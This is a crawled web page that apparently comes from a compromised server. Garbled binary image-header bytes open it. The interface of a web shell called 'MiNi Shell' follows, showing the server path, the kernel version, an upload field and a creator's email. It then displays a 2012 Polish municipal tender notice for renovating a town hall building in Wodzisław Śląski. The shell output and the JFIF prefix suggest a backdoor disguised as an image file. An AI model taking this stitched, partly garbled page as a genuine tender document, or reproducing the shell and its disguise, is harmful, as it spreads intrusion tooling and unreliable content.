JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120711/245618-N-2012.html

<p class="kh_header"><b>Wodzisław Śląski: Wykonanie robót budowlanych dla inwestycji pn.: Remont i termomodernizacja budynku  4 b Urzędu Miasta w  Wodzisławiu Śląskim.</b><br>
<b>Numer ogłoszenia: 245618 - 2012; data zamieszczenia: 11.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Wodzisław Śląski , ul. Bogumińska 4, 44-300 Wodzisław Śląski, woj. śląskie, tel. 32 4590431, faks 32 72 187 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodzislaw-slaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla inwestycji pn.: Remont i termomodernizacja budynku  4 b Urzędu Miasta w  Wodzisławiu Śląskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
1)Wykonanie robót budowlanych :
a) remont pomieszczeń  piwnic, parteru, II piętra oraz  wskazane  pomieszczenia            I piętra :
- 	roboty rozbiórkowe ścianek działowych,
-	wykonanie nowych ścianek działowych, 
zamurowanie otworów drzwiowych,
-     wymiana stolarki drzwiowej,
wymiana  posadzek ,
malowanie ścian i sufitów farbą emulsyjną  na gładzi gipsowej, 
wykonanie sufitów podwieszonych w wiatrołapie i korytarzu,
wymiana instalacji elektrycznej i sieci komputerowej,
b) wydzielenie klatek schodowych i wiatrołapu,
c) termomodernizacja :
wymiana stolarki okiennej (z zabudowaniem nawiewników higroregulowanych)         oprócz I piętra,
wymiana  stolarki drzwiowej zewnętrznej,
wymiana parapetów
docieplenie ścian metodą lekką mokrą styropianem i tynkiem silikatowym,
docieplenie cokołu i części ścian nadziemnych  metodą LAF z wtopionymi fabrycznie  płytkami klinkierowymi,
docieplenie ścian  piwnic poniżej terenu izodrenem,
ocieplenie stropodachu poprzez wdmuchiwanie  wełny mineralnej  granulowanej,
wymiana instalacji c.o. w piwnicy, parteru, II pietra,
d) wymiana obróbek  blacharskich,
e) wymiana rynien i rur spustowych
f) remont schodów zewnętrznych i zadaszenia,
g) drenaż opaskowy i wykonanie opaski wokół budynku,
h) wymiana instalacji odgromowej.


2)Wykonanie  dokumentacji powykonawczej  oraz czynności niezbędnych  do  użytkowania
pomieszczenia ,
3) Zlecenie wymaganych nadzorów branżowych,
4)Opracowanie świadectwa charakterystyki energetycznej zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 06 listopada 2008r. w sprawie metodologii obliczania  charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw i ich charakterystyki energetycznej ( Dz.U. 201/2008 poz.1240 ).

Szczegółowy  zakres robót do wykonania   zgodnie z zakresem podanym w projekcie budowlano-wykonawczym opracowanym przez  Biuro Projektowo-Usługowe  INPRO Spółka z o.o. z siedzibą w Krakowie, ul. Racławicka 56. 

  Uwaga! nie dotyczy przedmiotu zamówienia :
- zakres  robót Klimatyzacja pomieszczeń informatyków ujęty w pkt 4 w Projekcie nr 1119a  Architektura uzupełnienie  - wykonany przez    Zamawiającego,
-  zakres robót  ujęty  w projekcie budowlano wykonawczym  Nr 1118  i 1119A Architektura  aktualizacja obejmujący  remont i malowanie podłóg drewnianych -będzie przedmiotem odrębnego zamówienia. 

Wymagania organizacyjne: 
W związku z tym, że budowa będzie realizowana  w czynnym obiekcie użyteczności publicznej, należy tak uwzględnić organizację budowy i prowadzenia prac budowlanych, aby nie  zakłócić funkcjonowanie Urzędu Miasta. Wykonawca powinien  przewidzieć częściowe prowadzenie prac w systemie dwuzmianowym. 
Należy zapewnić bezpieczeństwo  osób pracujących i  załatwiających sprawę             w  obiekcie.
Przed  rozpoczęciem  prac remontowych  w poszczególnych pomieszczeniach  biurowych należy powiadomić  Zamawiającego (użytkownika) co najmniej  dwa dni przez planowanymi robotami budowlanymi, celem  przekazania frontu robót.
Wykonawca  jest zobowiązany sukcesywnie  przedkładać Zamawiającemu   szczegółowy   harmonogram  robót budowlanych  w zakresie remontu pomieszczeń biurowych.
Przed podpisaniem umowy Wykonawca przedłoży do  zatwierdzenia  harmonogram  rzeczowo finansowy , uzgodniony i akceptowany przez  Zamawiającego .
W celu lepszego zapoznania  się z przedmiotom zamówienia Zamawiający zaleca dokonanie   przez Wykonawcę (na własny koszt, ryzyko  i odpowiedzialność) wizji lokalnej na terenie budowy oraz uzyskanie  wszelkich informacji, które mogą wpłynąć na cenę zamówienia ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.26.13.20-3, 45.26.21.20-8, 45.32.10.00-3, 45.32.40.00-4, 45.42.10.00-4, 45.42.11.46-9, 45.44.21.00-8, 45.45.00.00-6, 45.45.30.00-7, 45.43.10.00-7, 45.23.13.00-8, 45.33.11.00-7, 45.31.00.00-2, 32.41.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże się wykonaniem w okresie ostatnich pięciu lat, licząc od dnia wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót związanych z budową, przebudową, remontem budynku o kubaturze min.5000,00 m3  tj.
1) wykonanie co najmniej dwóch zamówień w zakresie robót budowlanych, obejmujących łącznie ogólne roboty remontowo-budowlane oraz roboty instalacyjne w zakresie wew. Instalacji centralnego ogrzewania i elektrycznej o wartości min. 1.000.000 zł brutto.
2) co najmniej dwóch zadań obejmujących roboty związane z wykonaniem sieci   komputerowej o wartości min. 300.000,00 zł brutto.
 3) co najmniej dwóch zadań obejmujących roboty związane z termomodernizacją budynków (docieplenie ścian i stropu oraz wymiana stolarki okiennej i drzwiowej) o wartości min. 500.000,00 zł brutto.
W przypadku zrealizowania przez Wykonawcę docieplania łącznie z robotami określonymi w poz. 1, Zamawiający zaliczy wykonanie docieplania (wtedy dla pozycji 1 i 3 wystarczy przedłożyć dwa zadania obejmujące swoim zakresem łączny zakres), jednak wartość zamówienia zwiększy się do min. 1.500 000 zł. Przy każdym łączeniu zakresów robót postępowania zamawiającego będzie takie samo jak powyżej opisano.

Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat, licząc od dnia wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch usług w zakresie opracowania świadectw charakterystyki energetycznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże, że dysponuje lub będzie dysponował przy realizacji zadania osobami z uprawnieniami w zakresie niezbędnym do wykonania zamówienia tj. 

 Kierownik budowy -  minimalne wymagania :
uprawnienia budowlane w specjalności  konstrukcyjno-budowlanej ,
- 5 letni staż pracy  zawodowej  licząc od daty wydania uprawnień budowlanych do dnia upływu skradania oferty,
- doświadczenie w kierowaniu robotami budowlanymi  związanymi z realizacją  co najmniej 2   budynków , w tym 1   o kubaturze min.5000 m3   

 Kierownik robót sanitarnych.- minimalne wymagania :
uprawnienia budowlane w specjalności instalacyjnej w zakresie  instalacji  i  urządzeń  cieplnych,
doświadczenie w kierowaniu robotami  związanymi z  realizacją  co  najmniej 2   budynków,  

Kierownik robót elektrycznych i elektroenergetycznych- minimalne     wymagania :
- uprawnienia budowlane w specjalności instalacyjnej w zakresie  sieci,         instalacji  i urządzeń elektrycznych i elektroenergetycznych,  
 - doświadczenie w kierowaniu robotami  związanymi   z  realizacją  co najmniej  2  budynków,  

Osoba  odpowiedzialna za wykonanie sieci  komputerowej- minimalne    wymagania:
uprawnienia budowlane w specjalności instalacyjnej w zakresie  sieci
telekomunikacyjnej 
- doświadczenie w kierowaniu robotami  związanymi z  realizacją  sieci komputerowej  o wartości  min. 200.000 zł  

Osoba posiadająca uprawnienia w zakresie sporządzenia świadectw charakterystyki energetycznej w rozumieniu  art.5  ust.8 ustawy z dnia 07 lipca 2004 r. Prawo budowlane 
( Dz.U. Z 2006 Nr 156 poz 118 z póź. zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany treści zawartej umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówień  publicznych i mogą nastąpić tylko na piśmie w formie aneksu pod rygorem nieważności.
1.1. Zmiana treści umowy w zakresie  zmiany   terminu realizacji przedmiotu zamówienia  lub przesunięcia terminu odbioru robót, możliwa jest w przypadku  :
a) wystąpienia niekorzystnych warunków atmosferycznych mających wpływ na prawidłowe prowadzenie robót budowlano - montażowych, lub uniemożliwiających ich prowadzenie (zapisane w dzienniku budowy) - przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót,
b) konieczności zmiany dokumentacji projektowej wynikłej w trakcie realizacji inwestycji -  zmiana terminu realizacji zamówienia o tyle dni, ile trwało przeprojektowanie i konieczny czas na wykonanie robót,
c) zmiany producenta materiałów/urządzeń, wycofania materiałów/ urządzeń            z użycia - zmiana terminu   wykonania   zamówienia  o czas potrzebny na zakup nowych materiałów/urządzeń,
d) wystąpienia zdarzeń losowych - klęska żywiołowa - zmiana terminu wykonania zamówienia o tyle dni, ile trwało wstrzymanie robót,
e) konieczności wykonania robót dodatkowych  lub zamówień dodatkowych zgodnie z art.67 ust.1 pkt 5 ustawy Prawo zamówień publicznych, opóźniających lub wstrzymujących realizację  robót  zasadniczych - termin wykonania  zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu,
f) wykonania robót przewidzianych w projekcie opisującym przedmiot zamówienia, jednak nie wykazanych w przedmiarze i nie ujętych    w kosztorysie ofertowym,
g) pozyskania środków zewnętrznych  na przedmiotową inwestycję ( możliwość skrócenia terminu). 
             
    1.2. Zmiana treści zawartej umowy w zakresie zmiany wynagrodzenia  w sytuacji gdy:
a) zajdzie konieczność wykonania robót, które  zostały pominięte przez projektanta           (w przedmiarze robót  a znajdują się w projekcie  budowlanym)                                 a których wykonanie jest niezbędne do prawidłowej realizacji przedmiotowego     zamówienia, 
   b) wystąpią roboty zamienne spowodowane względami atmosferycznymi,                gruntowo- wodnymi, błędami w dokumentacji  technicznej, wycofaniem                          materiałów/urządzeń i zastosowanie  nowych  materiałów pozwalających na                    zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji                wykonanego przedmiotu umowy oraz innymi   niemożliwymi   do przewidzenia na                etapie podpisania  umowy,
c) zajdzie konieczność zmiany technologii wykonania  z uwagi na konieczność zastosowania innych rozwiązań technicznych i materiałowych ze względu na zmiany obowiązującego prawa oraz w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
d)  nastąpi zmiana obowiązującej stawki  VAT ,
e) zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna skutkująca niemożliwością wykonania lub  należytego wykonania  umowy  zgodnie z SIWZ.

    
   1.3. W  razie  wystąpienia   powyższych   przesłanek,  Wykonawca   jest             zobowiązany  do ich udokumentowania w sposób nie budzący zastrzeżeń (protokół          konieczności, notatkę - powyższe dokumenty muszą być zaakceptowane przez          projektanta) i przedłożone Zamawiającemu do zatwierdzania.

2. W przypadku wystąpienia robót dodatkowych, Wykonawca zobowiązany jest wykonać roboty dodatkowe, przy jednoczesnym zachowaniu tych samych norm i standardów. Wycenę tych robót wykona w oparciu o ceny oraz wskaźniki kalkulacyjne jak w ofercie przetargowej, natomiast ceny sprzętu i materiałów nieujętych w kosztorysie ofertowym wg cen rynkowych lub średnich cen Sekocenbudu. Podstawą wykonania robót dodatkowych jest zatwierdzony protokół konieczności robót dodatkowych, kosztorys ofertowy oraz podpisany aneks do  umowy. Wykonawca nie może żądać wynagrodzenia za dodatkowe zakresy robót bez przedłożenia w/w dokumentów.
3. Wykonawca bez pisemnej zgody Zamawiającego nie może dokonać żadnych cesji związanych z realizacją umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wodzislaw-slaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wodzisławia Śląskiego
Biuro Zamówień Publicznych
ul. Bogumińska 4b
44-300 Wodzisław Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2012 godzina 10:30, miejsce: Urząd Miasta Wodzisławia Śląskiego
Biuro Obsługi Klienta
ul. Bogumińska 4b
44-300 Wodzisław Śląski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com